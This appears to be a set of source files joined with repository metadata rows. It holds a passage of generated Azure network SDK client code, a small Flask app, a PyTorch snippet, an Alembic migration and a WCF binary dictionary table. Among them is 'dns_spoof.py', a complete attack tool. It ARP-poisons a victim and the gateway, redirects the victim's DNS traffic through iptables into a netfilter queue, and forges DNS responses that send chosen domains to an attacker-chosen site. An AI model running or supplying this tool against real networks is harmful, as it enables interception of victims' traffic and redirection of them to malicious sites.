:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The virtual network
gateway connection name.
:type virtual_network_gateway_connection_name: str
:param value: The virtual network connection shared key value.
:type value: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns ConnectionSharedKey or
ClientRawResponse<ConnectionSharedKey> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.ConnectionSharedKey]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_08_01.models.ConnectionSharedKey]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._set_shared_key_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
value=value,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ConnectionSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
set_shared_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}/sharedkey'}
def get_shared_key(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, **operation_config):
"""The Get VirtualNetworkGatewayConnectionSharedKey operation retrieves
information about the specified virtual network gateway connection
        shared key through the Network resource provider.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The virtual network
gateway connection shared key name.
:type virtual_network_gateway_connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectionSharedKey or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_08_01.models.ConnectionSharedKey or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_shared_key.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectionSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_shared_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}/sharedkey'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""The List VirtualNetworkGatewayConnections operation retrieves all the
        virtual network gateway connections created.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetworkGatewayConnection
:rtype:
~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnectionPaged[~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.VirtualNetworkGatewayConnectionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections'}
def _reset_shared_key_initial(
self, resource_group_name, virtual_network_gateway_connection_name, key_length, custom_headers=None, raw=False, **operation_config):
parameters = models.ConnectionResetSharedKey(key_length=key_length)
# Construct URL
url = self.reset_shared_key.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ConnectionResetSharedKey')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectionResetSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def reset_shared_key(
self, resource_group_name, virtual_network_gateway_connection_name, key_length, custom_headers=None, raw=False, polling=True, **operation_config):
"""The VirtualNetworkGatewayConnectionResetSharedKey operation resets the
        virtual network gateway connection shared key for the specified virtual
        network gateway connection in the specified resource group through the
        Network resource provider.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The virtual network
         gateway connection reset shared key name.
:type virtual_network_gateway_connection_name: str
:param key_length: The virtual network connection reset shared key
         length, which should be between 1 and 128.
:type key_length: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns
ConnectionResetSharedKey or
ClientRawResponse<ConnectionResetSharedKey> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.ConnectionResetSharedKey]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_08_01.models.ConnectionResetSharedKey]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._reset_shared_key_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
key_length=key_length,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ConnectionResetSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
reset_shared_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}/sharedkey/reset'}
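# Hedged usage sketch (not part of the generated module): these operations are
# normally reached through a NetworkManagementClient rather than instantiated
# directly. Assuming valid credentials, a subscription id, and an existing
# resource group/connection (names below are placeholders), the long-running
# delete call could be driven roughly like this:
#
#   from azure.mgmt.network import NetworkManagementClient
#   client = NetworkManagementClient(credentials, subscription_id)
#   poller = client.virtual_network_gateway_connections.delete('my-rg', 'my-connection')
#   poller.wait()  # delete() returns an LROPoller; wait() blocks until the operation completes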
| 49.686822 | 203 | 0.696299 |
4a1b3de00bf36b7cd46bb49854d39be3a38125df
| 6,970 |
py
|
Python
|
src/dns_spoof.py
|
vsingh27/DNS_Spoofer
|
78a1251f0ed316ac70e55bccf2a81822b1000176
|
[
"MIT"
] | null | null | null |
src/dns_spoof.py
|
vsingh27/DNS_Spoofer
|
78a1251f0ed316ac70e55bccf2a81822b1000176
|
[
"MIT"
] | null | null | null |
src/dns_spoof.py
|
vsingh27/DNS_Spoofer
|
78a1251f0ed316ac70e55bccf2a81822b1000176
|
[
"MIT"
] | null | null | null |
# dns_spoof.py
#
# Design and Program: Vishav Singh & Manuel Gonzales
#
# functions:
#
# def signal_handler(signum, frame)
# def sniffer()
# def get_address(interface, ip)
# def start_mitm(interface, victim, gateway)
# def parse(packet)
# def redirectionRules(victim)
# def getWebIP(website)
# def main()
#
# Program to spoof DNS responses to a victim machine. It works by first ARP
# poisoning the victim into believing this system is the gateway. This is done
# in order to sniff the victim's traffic and manipulate the DNS responses the
# victim machine gets, redirecting it to a different website.
#
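# Example invocation (illustrative only; the interface and addresses below are
# assumptions, not values from this project):
#
#   sudo python dns_spoof.py -i eth0 -d 192.168.1.10 -r 192.168.1.1 \
#       -w example.com -n attacker-site.example -t dns_spoof
#
# Root privileges are needed for the iptables rule and raw packet injection.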
import setproctitle
import optparse
import signal
from netfilterqueue import NetfilterQueue
from multiprocessing import Process
from scapy.all import *
from scapy.layers.inet import IP, UDP, Ether
# Constants
CONST_DESTINATION_PORT = 53
CONST_DNS_SERVER = "8.8.8.8"
# Global
mitm_running = False
spoof_running = True
process_name = "None"
websites = [] #websites array
new_website = "None"
# Main function to parse the arguments and start the MITM and sniffer processes
def main():
parser = optparse.OptionParser()
parser.add_option("-i", "--interface", type="string", dest="interface",
help="[REQUIRED] Local Interface to Use")
parser.add_option("-d", "--destination_ip", type="string", dest="destination_ip",
help="[REQUIRED] IP address to Sniff")
parser.add_option("-r", "--router_ip", type="string", dest="router_ip",
help="[REQUIRED] IP address of the gateway/router")
parser.add_option("-w", "--website", type="string", dest="website",
help="[REQUIRED] Website(s) to Spoof (Separated by commas)")
parser.add_option("-n", "--new_website", type="string", dest="new_website",
help="[REQUIRED] Website to redirect to")
parser.add_option("-t", "--title", type="string", dest="title",
help="[REQUIRED] Process name")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.error("Use -h or --help for instructions")
if not options.interface or not options.destination_ip or not options.router_ip or not options.new_website or not options.website or not options.title:
parser.error("Please fill in all the required parameters")
global process_name
global new_website
global websites
try:
signal.signal(signal.SIGINT, signal_handler)
setproctitle.setproctitle(options.title)
process_name = options.title
websites = options.website.split(",")
new_website = getWebIP(options.new_website)
conf.verb = 0
redirectionRules(options.destination_ip)
except Exception:
print "Couldn't set options"
return
p1 = Process(target=start_mitm, args=(options.interface, options.destination_ip, options.router_ip))
p1.start()
p2 = Process(target=sniffer)
p2.start()
p1.join()
    p2.terminate()  # Process.kill() is not available in Python 2's multiprocessing
# Function to stop all the processes in a clean manner when SIGINT (Ctrl + C) is caught.
# signum - type of signal caught
# frame - stack frame
def signal_handler(signum, frame):
global spoof_running
global process_name
print ("Process %s is Stopping..." % process_name)
spoof_running = False
time.sleep(1)
print ("Stopped %s" % process_name)
sys.exit(0)
# Function to start the netfilter queue which gets all of the traffic to port 53 from the victim machine
# it then sends each packet for parsing. On stop it clears the firewall rules.
def sniffer():
global process_name
setproctitle.setproctitle("sniffer")
process_name = "sniffer"
filterQueue = NetfilterQueue()
filterQueue.bind(1, parse)
try:
filterQueue.run()
except KeyboardInterrupt:
filterQueue.unbind()
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
# Function to resolve the MAC address of a system in the network.
# interface - local interface in use
# ip - IP of system to resolve
def get_address(interface, ip):
ans = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1)
return ans[Ether].src
# Function to start ARP poisoning a victim system in order to be able to sniff all the traffic going
# to it, and also be able to tamper with some of the traffic.
# interface - local interface in use
# victim - IP of the system to attack
# gateway - IP of the gateway/router
def start_mitm(interface, victim, gateway):
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
global spoof_running
global process_name
setproctitle.setproctitle("mitm")
process_name = "mitm"
try:
victim_address = get_address(interface, victim)
gateway_address = get_address(interface, gateway)
while spoof_running:
send(ARP(op=2, pdst=victim, psrc=gateway, hwdst=victim_address))
send(ARP(op=2, pdst=gateway, psrc=victim, hwdst=gateway_address))
time.sleep(0.5)
sys.exit(0)
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print "Couldn't start MITM"
return
# Function to parse the packets that reach the netfilter queue (through the iptables rule).
# It checks whether the packet is a DNS request and, if the request is for one of the
# websites to be spoofed, forges the response accordingly.
# packet - packet received by the queue
def parse(packet):
global websites
global new_website
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
for website in websites:
if website in pkt[DNS].qd.qname:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=new_website))
spoofed_pkt.show()
packet.set_payload(str(spoofed_pkt))
packet.accept()
return
packet.accept()
# Function to redirect all the DNS traffic from the victim system into the netfilter queue
# victim - IP of victim system
def redirectionRules(victim):
os.system("iptables -t nat -A PREROUTING -p udp -s " + victim + " --dport " + str(CONST_DESTINATION_PORT) + " -j NFQUEUE --queue-num 1")
# Function to resolve the IP of a domain.
# website - domain name of website to redirect to
def getWebIP(website):
answer = sr1(IP(dst=CONST_DNS_SERVER)/UDP(dport=CONST_DESTINATION_PORT)/DNS(rd=1,qd=DNSQR(qname=website)),verbose=0)
data_number = answer.getlayer(DNS).ancount
if data_number == 0: #domain not found
return website
new_ip = answer.getlayer(DNS).an[data_number-1].rdata
return new_ip
# start script
main()
| 30.17316 | 155 | 0.673027 |
4a1b3e0ad8609509bca269fa79412623c27d5bd5
| 1,474 |
py
|
Python
|
main.py
|
ijcruic/IDS_final
|
37a88494bd2c28bd3f1364631da775b8057cc59c
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
ijcruic/IDS_final
|
37a88494bd2c28bd3f1364631da775b8057cc59c
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
ijcruic/IDS_final
|
37a88494bd2c28bd3f1364631da775b8057cc59c
|
[
"Apache-2.0"
] | null | null | null |
"""`main` is the top level module for your Flask application."""
# Data Exploration Byte Version 3
#
# Copyright 2/2018 John Stamper
#
# Licensed under GPL v3 (http://www.gnu.org/licenses/gpl.html)
#
# Imports
import os
import jinja2
import webapp2
import logging
import json
import urllib
# this is used for constructing URLs to Google's APIs
from googleapiclient.discovery import build
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
# Import the Flask Framework
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def index():
template = JINJA_ENVIRONMENT.get_template('templates/index.html')
return template.render()
@app.route('/about')
def about():
template = JINJA_ENVIRONMENT.get_template('templates/about.html')
return template.render()
@app.route('/explore')
def explore():
template = JINJA_ENVIRONMENT.get_template('templates/explore.html')
return template.render()
@app.route('/attribute')
def attribute():
template = JINJA_ENVIRONMENT.get_template('templates/attribute.html')
return template.render()
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, Nothing at this URL.', 404
@app.errorhandler(500)
def application_error(e):
"""Return a custom 500 error."""
return 'Sorry, unexpected error: {}'.format(e), 500
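# Hedged note: on App Engine this module is served through the app.yaml entry
# point; for a quick local check one could (hypothetically) add:
#
#   if __name__ == '__main__':
#       app.run(host='127.0.0.1', port=8080, debug=True)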
| 24.983051 | 73 | 0.727273 |
4a1b3fa2c53ac0d80805d71f008fbd97e87725d7
| 135 |
py
|
Python
|
Util/main.py
|
Xiefan-Guo/Paper-PyTorch
|
5dbb68ba78f427b56e75ddbd95a68475951e1514
|
[
"MIT"
] | 2 |
2021-12-29T03:02:15.000Z
|
2021-12-29T06:31:18.000Z
|
Util/main.py
|
Xiefan-Guo/Paper-PyTorch
|
5dbb68ba78f427b56e75ddbd95a68475951e1514
|
[
"MIT"
] | null | null | null |
Util/main.py
|
Xiefan-Guo/Paper-PyTorch
|
5dbb68ba78f427b56e75ddbd95a68475951e1514
|
[
"MIT"
] | null | null | null |
import torch
w = torch.empty(3, 5)
torch.nn.init.constant_(w, 8)
x = torch.empty(3, 5)
torch.nn.init.constant_(x, 2)
print(w / x * 5)
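# w is filled with 8.0 and x with 2.0, so w / x * 5 prints a 3x5 tensor of 20.0 values.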
| 16.875 | 29 | 0.659259 |
4a1b41652eff40c40785a96423a4bc47d9578808
| 581 |
py
|
Python
|
htp/aux/alembic/versions/4e9d98be262d_drop_get_id_column_from_signals_table.py
|
kirkjules/machine-learned-timeseries
|
7aedec0fe04807fef1cf5e79a929652101d467f7
|
[
"MIT"
] | 1 |
2020-05-17T21:49:57.000Z
|
2020-05-17T21:49:57.000Z
|
htp/aux/alembic/versions/4e9d98be262d_drop_get_id_column_from_signals_table.py
|
kirkjules/machine-learned-timeseries
|
7aedec0fe04807fef1cf5e79a929652101d467f7
|
[
"MIT"
] | 3 |
2020-08-15T01:11:45.000Z
|
2022-01-13T03:22:25.000Z
|
htp/aux/alembic/versions/4e9d98be262d_drop_get_id_column_from_signals_table.py
|
kirkjules/machine-learned-timeseries
|
7aedec0fe04807fef1cf5e79a929652101d467f7
|
[
"MIT"
] | null | null | null |
"""drop get id column from signals table
Revision ID: 4e9d98be262d
Revises: 936cfe97ee13
Create Date: 2020-01-30 06:25:13.817984
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import UUID
# revision identifiers, used by Alembic.
revision = '4e9d98be262d'
down_revision = '936cfe97ee13'
branch_labels = None
depends_on = None
def upgrade():
op.drop_column('signals', 'get_id')
def downgrade():
op.add_column('signals', sa.Column(
'get_id', UUID(as_uuid=True), sa.ForeignKey("getTickerTask.id"),
unique=False))
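# Hedged note: with Alembic configured for this project, the migration above is
# typically applied and rolled back from the command line, e.g.
#
#   alembic upgrade 4e9d98be262d
#   alembic downgrade 936cfe97ee13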
| 20.75 | 72 | 0.731497 |
4a1b4172b48f20def66dc65375ed79f27fde8129
| 126 |
py
|
Python
|
groupmenotifier/main.py
|
daconex/GroupMeNotifier
|
9e0ea6e46e171a65b188510d4a33bafc0a51d685
|
[
"MIT"
] | 1 |
2015-11-26T05:58:45.000Z
|
2015-11-26T05:58:45.000Z
|
groupmenotifier/main.py
|
daconex/GroupMeNotifier
|
9e0ea6e46e171a65b188510d4a33bafc0a51d685
|
[
"MIT"
] | null | null | null |
groupmenotifier/main.py
|
daconex/GroupMeNotifier
|
9e0ea6e46e171a65b188510d4a33bafc0a51d685
|
[
"MIT"
] | null | null | null |
from groupme import GroupMe
api = GroupMe()
api.handshake()
api.auth()
api.user_details()
api.user_subscribe()
api.connect()
| 14 | 27 | 0.753968 |
4a1b4352ce0d90ce02b3c1f4c712bebd0d08fc9d
| 20,487 |
py
|
Python
|
wcf/dictionary.py
|
ringsaturn/python-wcfbin
|
7e9af1efd94ab30d149e7152d700d313f7896fb3
|
[
"BSD-3-Clause"
] | 3 |
2020-03-29T13:28:41.000Z
|
2022-03-31T20:30:27.000Z
|
wcf/dictionary.py
|
ringsaturn/python-wcfbin
|
7e9af1efd94ab30d149e7152d700d313f7896fb3
|
[
"BSD-3-Clause"
] | 1 |
2020-03-30T05:12:17.000Z
|
2020-03-30T05:12:17.000Z
|
wcf/dictionary.py
|
caiyunapp/python-wcfbin
|
7e9af1efd94ab30d149e7152d700d313f7896fb3
|
[
"BSD-3-Clause"
] | null | null | null |
# vim: set ts=4 sw=4 tw=79 fileencoding=utf-8:
# Copyright (c) 2011, Timo Schmid <tschmid@ernw.de>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the ERMW GmbH nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
dictionary = {
0x00: "mustUnderstand",
0x02: "Envelope",
0x04: "http://www.w3.org/2003/05/soap-envelope",
0x06: "http://www.w3.org/2005/08/addressing",
0x08: "Header",
0x0A: "Action",
0x0C: "To",
0x0E: "Body",
0x10: "Algorithm",
0x12: "RelatesTo",
0x14: "http://www.w3.org/2005/08/addressing/anonymous",
0x16: "URI",
0x18: "Reference",
0x1A: "MessageID",
0x1C: "Id",
0x1E: "Identifier",
0x20: "http://schemas.xmlsoap.org/ws/2005/02/rm",
0x22: "Transforms",
0x24: "Transform",
0x26: "DigestMethod",
0x28: "DigestValue",
0x2A: "Address",
0x2C: "ReplyTo",
0x2E: "SequenceAcknowledgement",
0x30: "AcknowledgementRange",
0x32: "Upper",
0x34: "Lower",
0x36: "BufferRemaining",
0x38: "http://schemas.microsoft.com/ws/2006/05/rm",
0x3A: "http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement",
0x3C: "SecurityTokenReference",
0x3E: "Sequence",
0x40: "MessageNumber",
0x42: "http://www.w3.org/2000/09/xmldsig#",
0x44: "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
0x46: "KeyInfo",
0x48: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd",
0x4A: "http://www.w3.org/2001/04/xmlenc#",
0x4C: "http://schemas.xmlsoap.org/ws/2005/02/sc",
0x4E: "DerivedKeyToken",
0x50: "Nonce",
0x52: "Signature",
0x54: "SignedInfo",
0x56: "CanonicalizationMethod",
0x58: "SignatureMethod",
0x5A: "SignatureValue",
0x5C: "DataReference",
0x5E: "EncryptedData",
0x60: "EncryptionMethod",
0x62: "CipherData",
0x64: "CipherValue",
0x66: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd",
0x68: "Security",
0x6A: "Timestamp",
0x6C: "Created",
0x6E: "Expires",
0x70: "Length",
0x72: "ReferenceList",
0x74: "ValueType",
0x76: "Type",
0x78: "EncryptedHeader",
0x7A: "http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd",
0x7C: "RequestSecurityTokenResponseCollection",
0x7E: "http://schemas.xmlsoap.org/ws/2005/02/trust",
0x80: "http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret",
0x82: "http://schemas.microsoft.com/ws/2006/02/transactions",
0x84: "s",
0x86: "Fault",
0x88: "MustUnderstand",
0x8A: "role",
0x8C: "relay",
0x8E: "Code",
0x90: "Reason",
0x92: "Text",
0x94: "Node",
0x96: "Role",
0x98: "Detail",
0x9A: "Value",
0x9C: "Subcode",
0x9E: "NotUnderstood",
0xA0: "qname",
0xA2: "",
0xA4: "From",
0xA6: "FaultTo",
0xA8: "EndpointReference",
0xAA: "PortType",
0xAC: "ServiceName",
0xAE: "PortName",
0xB0: "ReferenceProperties",
0xB2: "RelationshipType",
0xB4: "Reply",
0xB6: "a",
0xB8: "http://schemas.xmlsoap.org/ws/2006/02/addressingidentity",
0xBA: "Identity",
0xBC: "Spn",
0xBE: "Upn",
0xC0: "Rsa",
0xC2: "Dns",
0xC4: "X509v3Certificate",
0xC6: "http://www.w3.org/2005/08/addressing/fault",
0xC8: "ReferenceParameters",
0xCA: "IsReferenceParameter",
0xCC: "http://www.w3.org/2005/08/addressing/reply",
0xCE: "http://www.w3.org/2005/08/addressing/none",
0xD0: "Metadata",
0xD2: "http://schemas.xmlsoap.org/ws/2004/08/addressing",
0xD4: "http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous",
0xD6: "http://schemas.xmlsoap.org/ws/2004/08/addressing/fault",
0xD8: "http://schemas.xmlsoap.org/ws/2004/06/addressingex",
0xDA: "RedirectTo",
0xDC: "Via",
0xDE: "http://www.w3.org/2001/10/xml-exc-c14n#",
0xE0: "PrefixList",
0xE2: "InclusiveNamespaces",
0xE4: "ec",
0xE6: "SecurityContextToken",
0xE8: "Generation",
0xEA: "Label",
0xEC: "Offset",
0xEE: "Properties",
0xF0: "Cookie",
0xF2: "wsc",
0xF4: "http://schemas.xmlsoap.org/ws/2004/04/sc",
0xF6: "http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk",
0xF8: "http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct",
0xFA: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT",
0xFC: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT",
0xFE: "RenewNeeded",
0x100: "BadContextToken",
0x102: "c",
0x104: "http://schemas.xmlsoap.org/ws/2005/02/sc/dk",
0x106: "http://schemas.xmlsoap.org/ws/2005/02/sc/sct",
0x108: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT",
0x10A: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT",
0x10C: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew",
0x10E: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew",
0x110: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel",
0x112: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel",
0x114: "http://www.w3.org/2001/04/xmlenc#aes128-cbc",
0x116: "http://www.w3.org/2001/04/xmlenc#kw-aes128",
0x118: "http://www.w3.org/2001/04/xmlenc#aes192-cbc",
0x11A: "http://www.w3.org/2001/04/xmlenc#kw-aes192",
0x11C: "http://www.w3.org/2001/04/xmlenc#aes256-cbc",
0x11E: "http://www.w3.org/2001/04/xmlenc#kw-aes256",
0x120: "http://www.w3.org/2001/04/xmlenc#des-cbc",
0x122: "http://www.w3.org/2000/09/xmldsig#dsa-sha1",
0x124: "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
0x126: "http://www.w3.org/2000/09/xmldsig#hmac-sha1",
0x128: "http://www.w3.org/2001/04/xmldsig-more#hmac-sha256",
0x12A: "http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1",
0x12C: "http://www.w3.org/2001/04/xmlenc#ripemd160",
0x12E: "http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p",
0x130: "http://www.w3.org/2000/09/xmldsig#rsa-sha1",
0x132: "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256",
